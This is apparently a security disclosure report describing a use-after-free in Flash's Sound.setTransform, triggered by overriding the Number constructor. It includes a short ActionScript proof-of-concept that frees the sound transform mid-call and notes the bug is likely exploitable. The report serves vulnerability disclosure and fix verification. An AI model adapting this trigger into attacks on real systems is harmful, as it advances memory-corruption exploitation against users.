There is a use-after-free in Sound.setTransform, similar to the one reported in issue 568 (CVE-2015-8434). If the transform object provided is an integer primitive and the Number constructor has been overwritten (via _global.Number), that constructor is executed during the call and can free the internal sound transform, which setTransform then writes to. A minimal proof-of-concept is as follows:
this.createEmptyMovieClip("my_mc", 1);
var my_sound:Sound = new Sound("my_mc");
_global.Number = func; // replace the Number constructor with our callback
my_sound.attachSound("world"); // requires a library sound with linkage identifier "world"
my_sound.setTransform(7); // integer primitive: Flash invokes the overwritten Number constructor
my_sound.start();

function func() {
    my_mc.removeMovieClip(); // frees the internal sound transform while setTransform still holds it
    this.ll = 7; // actually construct a transform so setTransform proceeds and writes to the freed object
    this.lr = 7;
    this.rl = 7;
    this.rr = 7;
}
A PoC is attached. This PoC demonstrates the bug by allocating a new transform in the place of the freed one, and reading the values that get overwritten. The test fails (Flash is vulnerable) if the number written to the screen is 9999. The test passes if any other value is written. There are roughly 600 object types in Flash that are the same size as the object that is used after it is freed, so I suspect this issue is exploitable with enough effort.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Status: Fixed